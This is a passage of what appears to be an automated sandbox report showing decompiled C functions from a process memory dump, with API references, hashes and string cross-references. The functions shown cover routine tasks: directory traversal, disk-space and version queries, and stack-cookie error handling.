																	goto L72;
																}
															}
															 *0x4a754120 =  *0x4a754120 & 0x00000000;
															E4A733AB3(_t222);
															_t222 = 0;
															__eflags = 0;
															goto L58;
														}
														E4A7399E1(_t223);
														_t223 = 0x2340;
														goto L58;
													}
												}
												E4A741BE3(_t233, _v1596, _v1572, _t222);
												 *0x4a7541f0 = 1;
												goto L61;
											}
											_t197 = E4A74F619(_v1572, _v1580, _v1588,  &_v528, _t231);
											__eflags =  *0x4a75415c - _t222; // 0x0
											if(__eflags == 0) {
												L37:
												_push( &_v528);
												_push(_v1572);
												_push(_t233);
												_push( &_v1588);
												_v1600 = E4A7410A5( &_v1588, _t231, _v1580, _v1584);
												L38:
												__eflags =  *0x4a754120 - _t222; // 0x0
												if(__eflags == 0) {
													goto L33;
												}
												goto L39;
											}
											_t201 = E4A733B03(_t197, _t223, _v1572);
											__eflags = _t201;
											if(_t201 != 0) {
												goto L37;
											}
											_t204 = E4A74F46A( &_v1572,  &_v528, _v1588, _v1580, _v1592);
											__eflags = _t204 - 1;
											if(_t204 == 1) {
												L32:
												E4A732F5C(_v1576);
												E4A733AB3(_t231);
												E4A733AB3(_v1572);
												goto L68;
											}
											goto L37;
										}
										__eflags = _v1588 - _t222;
										if(_v1588 <= _t222) {
											goto L38;
										}
										_t209 = E4A74F619(_v1572, _v1580, _v1588,  &_v528, _t231);
										__eflags =  *0x4a75415c - _t222; // 0x0
										if(__eflags == 0) {
											goto L38;
										}
										_t210 = E4A733B03(_t209, _t223, _v1572);
										__eflags = _t210;
										if(_t210 != 0) {
											goto L38;
										}
										_t213 = E4A74F46A( &_v1572,  &_v528, _v1588, _v1580, _v1592);
										__eflags = _t213 - 1;
										if(_t213 != 1) {
											goto L38;
										}
										goto L32;
									}
									_t214 = E4A74224D(_t223,  &_v528);
									_v1572 = _t214;
									__eflags = _t214 - 0xffffffff;
									if(_t214 == 0xffffffff) {
										goto L70;
									}
									__imp___get_osfhandle();
									_t223 = _t214;
									SetEndOfFile(_t214);
									goto L26;
								}
							}
							_v1572 = E4A74F354( *((intOrPtr*)(_t233 + 4)), _t233, _v1580, _v1584);
							goto L40;
						}
						E4A732F5C(_v1576);
						goto L1;
					}
					_t220 = E4A740FEB(_v1584, 0x80,  &_v1604, 1);
					_v1592 = _t220;
					__eflags = _t220;
					if(_t220 == 0) {
						goto L1;
					} else {
						_t221 = _v1604;
						__eflags = _v1584 - _t221;
						if(_v1584 >= _t221) {
							_v1584 = _t221;
						}
						goto L6;
					}
				}
				L1:
				_t128 = 1;
				goto L64;
			}

0x4a74f6cf
0x4a74f6da
0x4a74f6e1
0x4a74f6e9
0x4a74f6ed
0x4a74f6f3
0x4a74f6fd
0x4a74f708
0x4a74f70d
0x4a74f715
0x4a74f71f
0x4a74f725
0x4a74f75a
0x4a74f75a
0x4a74f76a
0x4a74f76c
0x4a74f771
0x4a74f773
0x00000000
0x00000000
0x4a74f75f
0x4a74f762
0x4a74f764
0x4a74fc10
0x4a74fc10
0x4a74fc10
0x4a74fc12
0x4a74fc20
0x4a74fc20
0x4a74f764
0x4a74f783
0x4a74f788
0x4a74f788
0x4a74f78f
0x4a74f792
0x4a74f794
0x4a74f799
0x4a74f799
0x4a74f79c
0x4a74f79c
0x4a74f79f
0x4a74f7a5
0x00000000
0x00000000
0x4a74f7ab
0x4a74f7b9
0x4a74f7be
0x4a74f7c1
0x00000000
0x00000000
0x4a74f7cf
0x4a74f7d5
0x4a74f7e6
0x4a74f7eb
0x4a74f7ee
0x00000000
0x00000000
0x4a74f7f4
0x4a74f7fb
0x4a74fbed
0x4a74fbf8
0x4a74fbfd
0x4a74fbff
0x00000000
0x00000000
0x4a74fc0b
0x00000000
0x4a74fc0b
0x4a74f80b
0x4a74f810
0x4a74f812
0x4a74f848
0x4a74f84a
0x4a74f84d
0x4a74fc39
0x4a74fc3e
0x4a74fc40
0x4a74fc45
0x4a74fc45
0x4a74fc47
0x4a74fc48
0x4a74fc48
0x4a74fc4d
0x4a74fc53
0x4a74fc59
0x00000000
0x4a74fc59
0x4a74f854
0x4a74f859
0x4a74f85b
0x4a74f85d
0x4a74f85d
0x4a74f86d
0x4a74f86e
0x4a74f87a
0x4a74f87b
0x4a74f88e
0x4a74f894
0x4a74f89a
0x00000000
0x4a74f8a0
0x4a74f8a7
0x4a74f8ad
0x4a74f8b5
0x4a74f8e6
0x4a74f8ec
0x4a74f8ec
0x4a74f8f3
0x00000000
0x00000000
0x4a74f8f9
0x4a74f8ff
0x4a74f99e
0x4a74f99e
0x4a74f9a5
0x4a74fa48
0x4a74fa49
0x4a74fa4f
0x4a74fa54
0x4a74fa54
0x4a74fa5a
0x4a74fbc8
0x4a74fbc8
0x4a74fbca
0x00000000
0x00000000
0x4a74fa62
0x4a74fa65
0x4a74fa67
0x4a74fa6c
0x4a74fa6c
0x4a74fa6f
0x4a74fa6f
0x4a74fa83
0x4a74fa88
0x4a74fa8a
0x4a74faa1
0x4a74fa8c
0x4a74fa8c
0x4a74fa8d
0x4a74fa8e
0x4a74fa8e
0x4a74faa7
0x4a74faaf
0x4a74fab4
0x4a74fab6
0x4a74fbc5
0x4a74fbc5
0x00000000
0x4a74fabc
0x4a74faca
0x4a74facf
0x4a74fad0
0x4a74fad2
0x4a74faeb
0x4a74faf1
0x4a74faf3
0x4a74faf6
0x4a74fc66
0x4a74fc71
0x4a74fc78
0x4a74fc7d
0x4a74fc7d
0x4a74fc7f
0x00000000
0x4a74fc7f
0x4a74fafd
0x4a74fb02
0x4a74fb04
0x4a74fb0a
0x4a74fb0a
0x4a74fba9
0x4a74fba9
0x4a74fbb0
0x00000000
0x00000000
0x4a74fb1f
0x4a74fb20
0x4a74fb2c
0x4a74fb2d
0x4a74fb3b
0x4a74fb40
0x4a74fb42
0x00000000
0x00000000
0x4a74fb5e
0x4a74fb63
0x4a74fb6a
0x00000000
0x00000000
0x4a74fb72
0x4a74fb77
0x4a74fb79
0x00000000
0x00000000
0x4a74fb9b
0x4a74fba0
0x4a74fba3
0x4a74fc89
0x4a74fc8f
0x4a74fc9a
0x00000000
0x4a74fc9a
0x4a74fba3
0x4a74fbb6
0x4a74fbbe
0x4a74fbc3
0x4a74fbc3
0x00000000
0x4a74fbc3
0x4a74fad9
0x4a74fadf
0x00000000
0x4a74fadf
0x4a74fab6
0x4a74fbde
0x4a74fbe3
0x00000000
0x4a74fbe3
0x4a74f9c5
0x4a74f9ca
0x4a74f9d0
0x4a74fa0f
0x4a74fa15
0x4a74fa16
0x4a74fa22
0x4a74fa23
0x4a74fa36
0x4a74fa3c
0x4a74fa3c
0x4a74fa42
0x00000000
0x00000000
0x00000000
0x4a74fa42
0x4a74f9d8
0x4a74f9dd
0x4a74f9df
0x00000000
0x00000000
0x4a74fa01
0x4a74fa06
0x4a74fa09
0x4a74f97d
0x4a74f983
0x4a74f989
0x4a74f994
0x00000000
0x4a74f994
0x00000000
0x4a74fa09
0x4a74f905
0x4a74f90b
0x00000000
0x00000000
0x4a74f92b
0x4a74f930
0x4a74f936
0x00000000
0x00000000
0x4a74f942
0x4a74f947
0x4a74f949
0x00000000
0x00000000
0x4a74f96f
0x4a74f974
0x4a74f977
0x00000000
0x00000000
0x00000000
0x4a74f977
0x4a74f8b8
0x4a74f8bd
0x4a74f8c3
0x4a74f8c6
0x00000000
0x00000000
0x4a74f8cd
0x4a74f8d3
0x4a74f8d5
0x00000000
0x4a74f8d5
0x4a74f89a
0x4a74f829
0x00000000
0x4a74f829
0x4a74fc29
0x00000000
0x4a74fc29
0x4a74f737
0x4a74f73c
0x4a74f742
0x4a74f744
0x00000000
0x4a74f746
0x4a74f746
0x4a74f74c
0x4a74f752
0x4a74f754
0x4a74f754
0x00000000
0x4a74f752
0x4a74f744
0x4a74f717
0x4a74f719
0x00000000

Strings

%s, xrefs: 4A74F7CA, 4A74FA9C

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID: %s
API String ID: 4275171209-3043279178
Opcode ID: a9e5fea68f241675133149b79f92d5615f49a3767a0768e9e8ae651dee12ba17
Instruction ID: 9a96a9c590b3916e5c3760d42a99b00132ed7170bb6b88919143117070285956
Opcode Fuzzy Hash: a9e5fea68f241675133149b79f92d5615f49a3767a0768e9e8ae651dee12ba17
Instruction Fuzzy Hash: B4E188B2809629AEDF319F60CD44EDE7B7AFF49710F0101D5E509A6092D732AAADCF50

Uniqueness

Uniqueness Score: -1.00%

Function 4A7313A9, Relevance: 6.0, APIs: 4, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E4A7313A9(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				intOrPtr* _t26;
				void* _t29;

				_t29 = __ecx -  *0x4a7540ac; // 0xbb40e64e
				if(_t29 != 0) {
					 *0x4a754388 = __eax;
					 *0x4a754384 = __ecx;
					 *0x4a754380 = __edx;
					 *0x4a75437c = __ebx;
					 *0x4a754378 = __esi;
					 *0x4a754374 = __edi;
					 *0x4a7543a0 = ss;
					 *0x4a754394 = cs;
					 *0x4a754370 = ds;
					 *0x4a75436c = es;
					 *0x4a754368 = fs;
					 *0x4a754364 = gs;
					asm("pushfd");
					_pop( *0x4a754398);
					 *0x4a75438c =  *_t26;
					 *0x4a754390 = _v0;
					 *0x4a75439c =  &_a4;
					 *0x4a7542d8 = 0x10001;
					_t11 =  *0x4a754390; // 0x0
					 *0x4a754294 = _t11;
					 *0x4a754288 = 0xc0000409;
					 *0x4a75428c = 1;
					_t12 =  *0x4a7540ac; // 0xbb40e64e
					_v812 = _t12;
					_t13 =  *0x4a7540b0; // 0x44bf19b1
					_v808 = _t13;
					SetUnhandledExceptionFilter(0);
					UnhandledExceptionFilter(E4A7523F8);
					return TerminateProcess(GetCurrentProcess(), 0xc0000409);
				} else {
					return __eax;
				}
			}

0x4a7313a9
0x4a7313af
0x4a752325
0x4a75232a
0x4a752330
0x4a752336
0x4a75233c
0x4a752342
0x4a752348
0x4a75234e
0x4a752354
0x4a75235a
0x4a752360
0x4a752366
0x4a75236c
0x4a75236d
0x4a752376
0x4a75237e
0x4a752386
0x4a752391
0x4a75239b
0x4a7523a0
0x4a7523a5
0x4a7523af
0x4a7523b9
0x4a7523be
0x4a7523c4
0x4a7523c9
0x4a7523d1
0x4a7523dc
0x4a7523f5
0x4a7313b5
0x4a7313b5
0x4a7313b5

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 4A7523D1
UnhandledExceptionFilter.KERNEL32(4A7523F8), ref: 4A7523DC
GetCurrentProcess.KERNEL32(C0000409), ref: 4A7523E7
TerminateProcess.KERNEL32(00000000), ref: 4A7523EE

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
String ID:
API String ID: 3231755760-0
Opcode ID: b2e0d18def8911208ac053c7b1bb2b8c61bc788c2465af3d4a53621ac0b5b0bd
Instruction ID: f9bfa513563cc0e7dd6da2e78a7a17cf46b99eb1872fcef7477525c3d4fc266b
Opcode Fuzzy Hash: b2e0d18def8911208ac053c7b1bb2b8c61bc788c2465af3d4a53621ac0b5b0bd
Instruction Fuzzy Hash: AF21CEF98A2320DFD760CFA9D5466487BFEBB4A301B12405AE508E7E20E7705D81DF05

Uniqueness

Uniqueness Score: -1.00%

Function 4A74BF0C, Relevance: 4.8, APIs: 3, Instructions: 253
fileCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E4A74BF0C(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, short* _a20) {
				signed int _v8;
				struct _WIN32_FIND_DATAW _v600;
				WCHAR* _v604;
				void* _v608;
				intOrPtr _v612;
				short* _v616;
				intOrPtr _v620;
				intOrPtr _v624;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t60;
				intOrPtr* _t62;
				signed int _t65;
				intOrPtr _t66;
				intOrPtr* _t76;
				void* _t87;
				intOrPtr* _t92;
				intOrPtr* _t93;
				intOrPtr* _t94;
				intOrPtr* _t98;
				WCHAR* _t108;
				short* _t114;
				intOrPtr _t117;
				void* _t123;
				intOrPtr* _t124;
				void* _t128;
				intOrPtr* _t130;
				intOrPtr* _t131;
				intOrPtr _t132;
				signed int _t133;
				intOrPtr* _t137;
				void* _t138;
				intOrPtr _t140;
				intOrPtr _t141;
				signed short _t143;
				short* _t144;
				signed int _t149;

				_t60 =  *0x4a7540ac; // 0xbb40e64e
				_v8 = _t60 ^ _t149;
				_t62 = _a4;
				_v620 = _a8;
				_t139 = _a20;
				_v612 = _a12;
				_v608 = _t62;
				_v616 = _t139;
				_t143 = 0;
				_t123 = _t62 + 2;
				do {
					_t137 =  *_t62;
					_t62 = _t62 + 2;
				} while (_t137 != 0);
				_t65 = _t62 - _t123 >> 1;
				_t124 = _t139;
				if( *_t139 == 0) {
					L7:
					_t66 = 0;
				} else {
					do {
						_t137 = _t124;
						do {
							_t117 =  *_t124;
							_t124 = _t124 + 2;
						} while (_t117 != 0);
						_t116 = (_t124 - _t137 >> 1) + _t65;
						_t143 = _t143 + (_t124 - _t137 >> 1) + _t65;
					} while ( *_t124 != 0);
					if(0 != _t143) {
						_t143 = _t143 + 1;
						_t69 = _t143 & 0x0000ffff;
						_v604 = _t143 & 0x0000ffff;
						_t116 = E4A731896((_t143 & 0x0000ffff) + _t69);
						if(_t116 != 0) {
							_t144 = _t116;
							if( *_t139 != 0) {
								do {
									_v624 = _v604 - (_t144 - _t116 >> 1);
									E4A73185A(_t144, _v604 - (_t144 - _t116 >> 1), _v608);
									E4A7320A9(_t144, _t144, _v624, _t139);
									_t114 = E4A73413B(_t139);
									_t139 = _t114;
									_t144 = E4A73413B(_t144);
								} while ( *_t114 != 0);
							}
							 *_t144 = 0;
							_t139 = E4A73E342(_v620, _v612, _a16, _t116, 1);
							E4A73142E(_t116);
							_t76 = _v608;
							_t128 = _t76 + 2;
							do {
								_t137 =  *_t76;
								_t76 = _t76 + 2;
							} while (_t137 != 0);
							_t116 = (_t76 - _t128 >> 1) + 2;
							_t143 = E4A731896(_t116 + _t116);
							_v604 = _t143;
							if(_t143 == 0) {
								goto L9;
							} else {
								E4A73185A(_t143, _t116, _v608);
								_t143 = E4A732ED1(_t143) + 2;
								E4A7320A9(_t143, _v604, _t116, E4A739FFC);
								_t87 = FindFirstFileW(_v604,  &_v600);
								_v608 = _t87;
								 *_t143 = 0;
								if(_t87 != 0xffffffff) {
									L16:
									while(1) {
										if((_v600.dwFileAttributes & 0x00000010) == 0) {
											L41:
											if(FindNextFileW(_v608,  &_v600) != 0) {
												continue;
											}
										} else {
											_t130 = E4A732EC4;
											_t92 =  &(_v600.cFileName);
											while(1) {
												_t137 =  *_t92;
												if(_t137 !=  *_t130) {
													break;
												}
												if(_t137 == 0) {
													L22:
													_t92 = 0;
												} else {
													_t137 =  *((intOrPtr*)(_t92 + 2));
													_t34 = _t130 + 2; // 0x5c0000
													if(_t137 !=  *_t34) {
														break;
													} else {
														_t92 = _t92 + 4;
														_t130 = _t130 + 4;
														if(_t137 != 0) {
															continue;
														} else {
															goto L22;
														}
													}
												}
												L24:
												if(_t92 == 0) {
													goto L41;
												} else {
													_t131 = E4A732EBC;
													_t93 =  &(_v600.cFileName);
													while(1) {
														_t137 =  *_t93;
														if(_t137 !=  *_t131) {
															break;
														}
														if(_t137 == 0) {
															L30:
															_t93 = 0;
														} else {
															_t137 =  *((intOrPtr*)(_t93 + 2));
															_t37 = _t131 + 2; // 0x2e
															if(_t137 !=  *_t37) {
																break;
															} else {
																_t93 = _t93 + 4;
																_t131 = _t131 + 4;
																if(_t137 != 0) {
																	continue;
																} else {
																	goto L30;
																}
															}
														}
														L32:
														if(_t93 == 0) {
															goto L41;
														} else {
															_t94 = _v604;
															_t138 = _t94 + 2;
															do {
																_t132 =  *_t94;
																_t94 = _t94 + 2;
															} while (_t132 != 0);
															_t133 = _t94 - _t138 >> 1;
															_t98 =  &(_v600.cFileName);
															_t137 = _t98 + 2;
															do {
																_t140 =  *_t98;
																_t98 = _t98 + 2;
															} while (_t140 != 0);
															_t141 = (_t98 - _t137 >> 1) + _t133 + 2;
															if(_t141 <= _t116) {
																L40:
																E4A7320A9(_t143, _v604, _t116,  &(_v600.cFileName));
																E4A7320A9(_t143, _v604, _t116, E4A732EC8);
																_t139 = E4A74BF0C(_v604, _v620, _v612, _a16, _v616);
																 *_t143 = 0;
																goto L41;
															} else {
																_t108 = E4A732536(_v604, _t141 + _t141);
																if(_t108 == 0) {
																	_t139 = 1;
																} else {
																	_v604 = _t108;
																	_t116 = _t141;
																	_t143 = E4A732ED1(_t108) + 2;
																	goto L40;
																}
															}
														}
														goto L44;
													}
													asm("sbb eax, eax");
													asm("sbb eax, 0xffffffff");
													goto L32;
												}
												goto L44;
											}
											asm("sbb eax, eax");
											asm("sbb eax, 0xffffffff");
											goto L24;
										}
										L44:
										FindClose(_v608);
										goto L45;
									}
								}
								L45:
								E4A73142E(_v604);
								_t66 = _t139;
							}
						} else {
							L9:
							_t66 = 1;
						}
					} else {
						goto L7;
					}
				}
				return E4A7313A9(_t66, _t116, _v8 ^ _t149, _t137, _t139, _t143);
			}

0x4a74bf17
0x4a74bf1e
0x4a74bf24
0x4a74bf29
0x4a74bf33
0x4a74bf36
0x4a74bf3c
0x4a74bf42
0x4a74bf48
0x4a74bf4a
0x4a74bf4d
0x4a74bf4d
0x4a74bf51
0x4a74bf52
0x4a74bf59
0x4a74bf5b
0x4a74bf60
0x4a74bf85
0x4a74bf85
0x4a74bf62
0x4a74bf62
0x4a74bf62
0x4a74bf64
0x4a74bf64
0x4a74bf68
0x4a74bf69
0x4a74bf74
0x4a74bf76
0x4a74bf78
0x4a74bf83
0x4a74bf8c
0x4a74bf8d
0x4a74bf90
0x4a74bf9e
0x4a74bfa2
0x4a74bfb2
0x4a74bfb4
0x4a74bfb6
0x4a74bfcc
0x4a74bfd2
0x4a74bfdf
0x4a74bfe5
0x4a74bfeb
0x4a74bff6
0x4a74bff6
0x4a74bfb6
0x4a74c008
0x4a74c017
0x4a74c019
0x4a74c01e
0x4a74c024
0x4a74c027
0x4a74c027
0x4a74c02b
0x4a74c02c
0x4a74c035
0x4a74c041
0x4a74c043
0x4a74c04b
0x00000000
0x4a74c051
0x4a74c059
0x4a74c073
0x4a74c074
0x4a74c086
0x4a74c08e
0x4a74c094
0x4a74c09a
0x00000000
0x4a74c0a0
0x4a74c0a7
0x4a74c1d1
0x4a74c1e6
0x00000000
0x4a74c1e8
0x4a74c0ad
0x4a74c0ad
0x4a74c0b2
0x4a74c0b8
0x4a74c0b8
0x4a74c0be
0x00000000
0x00000000
0x4a74c0c3
0x4a74c0da
0x4a74c0da
0x4a74c0c5
0x4a74c0c5
0x4a74c0c9
0x4a74c0cd
0x00000000
0x4a74c0cf
0x4a74c0cf
0x4a74c0d2
0x4a74c0d8
0x00000000
0x00000000
0x00000000
0x00000000
0x4a74c0d8
0x4a74c0cd
0x4a74c0e3
0x4a74c0e5
0x00000000
0x4a74c0eb
0x4a74c0eb
0x4a74c0f0
0x4a74c0f6
0x4a74c0f6
0x4a74c0fc
0x00000000
0x00000000
0x4a74c101
0x4a74c118
0x4a74c118
0x4a74c103
0x4a74c103
0x4a74c107
0x4a74c10b
0x00000000
0x4a74c10d
0x4a74c10d
0x4a74c110
0x4a74c116
0x00000000
0x00000000
0x00000000
0x00000000
0x4a74c116
0x4a74c10b
0x4a74c121
0x4a74c123
0x00000000
0x4a74c129
0x4a74c129
0x4a74c12f
0x4a74c132
0x4a74c132
0x4a74c136
0x4a74c137
0x4a74c140
0x4a74c142
0x4a74c148
0x4a74c14b
0x4a74c14b
0x4a74c14f
0x4a74c150
0x4a74c159
0x4a74c15f
0x4a74c186
0x4a74c194
0x4a74c1a5
0x4a74c1ca
0x4a74c1ce
0x00000000
0x4a74c161
0x4a74c16b
0x4a74c172
0x4a74c1ef
0x4a74c174
0x4a74c175
0x4a74c17b
0x4a74c185
0x00000000
0x4a74c185
0x4a74c172
0x4a74c15f
0x00000000
0x4a74c123
0x4a74c11c
0x4a74c11e
0x00000000
0x4a74c11e
0x00000000
0x4a74c0e5
0x4a74c0de
0x4a74c0e0
0x00000000
0x4a74c0e0
0x4a74c1f0
0x4a74c1f6
0x00000000
0x4a74c1f6
0x4a74c0a0
0x4a74c1fc
0x4a74c202
0x4a74c207
0x4a74c207
0x4a74bfa4
0x4a74bfa4
0x4a74bfa6
0x4a74bfa6
0x00000000
0x00000000
0x00000000
0x4a74bf83
0x4a74c217

APIs

Part of subcall function 4A731896: GetProcessHeap.KERNEL32(00000008,4A7325C0,4A7325BB,?,4A7319FD,4A7325BA,00000001,00000000,?,4A737037,4A7325B8,4A737238,00000228,4A736C92,4A7325B8,?), ref: 4A7318A9
Part of subcall function 4A731896: HeapAlloc.KERNEL32(00000000,?,4A7319FD,4A7325BA,00000001,00000000,?,4A737037,4A7325B8,4A737238,00000228,4A736C92,4A7325B8,?,?,4A736CE6), ref: 4A7318B0

FindFirstFileW.KERNEL32(?,?,?,?,Function_00009FFC,00000000,00000000,?,?,?,00000000,?,?,00000000,00000000,00000001), ref: 4A74C086

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: Heap$AllocFileFindFirstProcess
String ID:
API String ID: 2094127529-0
Opcode ID: cebb4e28142f36aabcfda4fbc17b3b4f93cc50f6d82902c426e31792a4f2f078
Instruction ID: d5547e9ce62031cae1de1329b2e942fbea25d98ca9b850094f81486a517a3b00
Opcode Fuzzy Hash: cebb4e28142f36aabcfda4fbc17b3b4f93cc50f6d82902c426e31792a4f2f078
Instruction Fuzzy Hash: 85813931A0951AAFDB749F74CC48AEA7FB9EF54350F0202A4D905EB161EB71CE89CB40

Uniqueness

Uniqueness Score: -1.00%

Function 4A743185, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E4A743185(intOrPtr __ebx, void* __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				short _v532;
				signed int _v536;
				union _ULARGE_INTEGER _v540;
				union _ULARGE_INTEGER _v548;
				union _ULARGE_INTEGER _v556;
				void* __edi;
				void* __esi;
				signed int _t21;
				intOrPtr _t43;
				void* _t44;
				intOrPtr _t47;
				signed int _t51;

				_t47 = __edx;
				_t44 = __ecx;
				_t43 = __ebx;
				_t21 =  *0x4a7540ac; // 0xbb40e64e
				_v8 = _t21 ^ _t51;
				_t48 = _a4;
				E4A73AA4F(_a4);
				E4A73185A( &_v532, 0x106, _a8);
				if(E4A742620( &_v532) != 0) {
					E4A7320A9(0x106,  &_v532, 0x106, E4A732EC8);
				}
				_v536 = _v536 & 0x00000000;
				_v540.LowPart = _v540.LowPart & 0x00000000;
				GetDiskFreeSpaceExW( &_v532,  &_v540,  &_v556,  &_v548);
				E4A742CB6(_t44, _t48, 6);
				E4A74292F(_a12,  &_v540, 0xe,  &_v532, 0x106);
				return E4A7313A9(E4A74301F(_t47, _t48, 0x2379, 2, E4A739A2C(L"%5lu", _a16)), _t43, _v8 ^ _t51, _t47, _t48, 0x106,  &_v532);
			}

0x4a743185
0x4a743185
0x4a743185
0x4a743190
0x4a743197
0x4a74319f
0x4a7431a3
0x4a7431b6
0x4a7431c9
0x4a74ac03
0x4a74ac03
0x4a7431cf
0x4a7431d6
0x4a7431f9
0x4a743202
0x4a74321b
0x4a743252

APIs

GetDiskFreeSpaceExW.KERNEL32(?,00000000,?,?,?,?,00000106,?,?,00000106,?), ref: 4A7431F9

Part of subcall function 4A74292F: wcsncmp.MSVCRT(?,4A754920,?,?,?,?), ref: 4A7429ED

Part of subcall function 4A74301F: FormatMessageW.KERNEL32(00001900,00000000,00000000,00000000,?,0000000A,?,?,?,?), ref: 4A74305C
Part of subcall function 4A74301F: LocalFree.KERNEL32(?,?,?), ref: 4A743088

Strings

%5lu, xrefs: 4A74322A

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: Free$DiskFormatLocalMessageSpacewcsncmp
String ID: %5lu
API String ID: 482386376-2100233843
Opcode ID: 9f8d375f1a152a65c548c041b65d366c6571dbb2fe2fc964397f5129630fbf77
Instruction ID: 4c0618e4e428eee7e0819c666bcee31ec6815499400379c6a9b6835270451e06
Opcode Fuzzy Hash: 9f8d375f1a152a65c548c041b65d366c6571dbb2fe2fc964397f5129630fbf77
Instruction Fuzzy Hash: 1C216F7294411DBADB30DA90CC88FEF777CAF55310F050595F605EA042DA709B88CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 4A73D3B3, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E4A73D3B3(intOrPtr _a4, intOrPtr _a8) {
				signed char _t3;

				_t3 = GetVersion();
				_push(_t3 >> 0x00000010 & 0x00003fff);
				_push(_t3 >> 0x00000008 & 0x000000ff);
				return E4A73179D(_a4, _a8, L"%d.%d.%04d", _t3 & 0x000000ff);
			}

0x4a73d3b8
0x4a73d3c9
0x4a73d3d5
0x4a73d3ee

APIs

GetVersion.KERNEL32(?,4A73C88C,?,00000020), ref: 4A73D3B8

Part of subcall function 4A73179D: _vsnwprintf.MSVCRT ref: 4A7317CB

Strings

%d.%d.%04d, xrefs: 4A73D3DA

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: Version_vsnwprintf
String ID: %d.%d.%04d
API String ID: 2848646618-2515412502
Opcode ID: 95691abfa390e0d480161e5682a9f679d3bdf38c796b3cf165d3180dfa78acae
Instruction ID: d1123d7e13a0254319d66f2f42e29ab608a4d93768fcb724cd84036fdb581b65
Opcode Fuzzy Hash: 95691abfa390e0d480161e5682a9f679d3bdf38c796b3cf165d3180dfa78acae
Instruction Fuzzy Hash: 59D02BB250940B3BDF281624DC15D79379DD7D0300B454078BD0BC5183DE354A24D3A0

Uniqueness

Uniqueness Score: -1.00%

Function 4A744E44, Relevance: 3.0, APIs: 2, Instructions: 11timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?,00002000,4A760640,75A9A9E9), ref: 4A744E4F
SystemTimeToFileTime.KERNEL32(?,?), ref: 4A744E63

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: Time$System$File
String ID:
API String ID: 2838179519-0
Opcode ID: 72dde1aaa667d25df0036c3f1e6a331802687fb5ba1e23608bf17df89102c3d7
Instruction ID: e1e031d432f4ff1450810ab5f7f2e4933398731b00e9a17ec32bec70fc2d98ea
Opcode Fuzzy Hash: 72dde1aaa667d25df0036c3f1e6a331802687fb5ba1e23608bf17df89102c3d7
Instruction Fuzzy Hash: 51D0C9B280915C9FCF229BE0CC489DB7BBCBF0A382F0505D2E245D7401D631AA59CF50

Uniqueness

Uniqueness Score: -1.00%

Function 4A737C63, Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 4A737C68

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 56d35c88499024af53fc77dd2c83fafd6c6dcfa635bb21a256ca949e7a8c142c
Instruction ID: 6f6062ebf520129d4323d670ba07d1cb49a1e40834e424a94bedf2bd5719de92
Opcode Fuzzy Hash: 56d35c88499024af53fc77dd2c83fafd6c6dcfa635bb21a256ca949e7a8c142c
Instruction Fuzzy Hash: E09002B1516140469E6117F0490998726B46A9915375204506701CCC08DF114404E791

Uniqueness

Uniqueness Score: -1.00%

Function 4A7434E2, Relevance: 54.6, APIs: 24, Strings: 7, Instructions: 306
memoryCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E4A7434E2(void* _a4, void* _a8, long _a12, DWORD* _a16) {
				void* _v8;
				struct _COORD _v12;
				void* _v16;
				long _v20;
				long _v24;
				int _v28;
				void* _v32;
				signed int _v36;
				void* _v40;
				void _v44;
				intOrPtr _v62;
				struct _CONSOLE_SCREEN_BUFFER_INFO _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t71;
				int _t72;
				int _t82;
				signed int _t86;
				signed int _t87;
				signed int _t92;
				void* _t94;
				signed int _t96;
				long _t97;
				void* _t98;
				void* _t104;
				int _t109;
				void* _t110;
				DWORD* _t127;
				void* _t129;
				void* _t130;
				signed char _t132;
				signed char _t133;
				signed int _t134;
				signed int _t135;
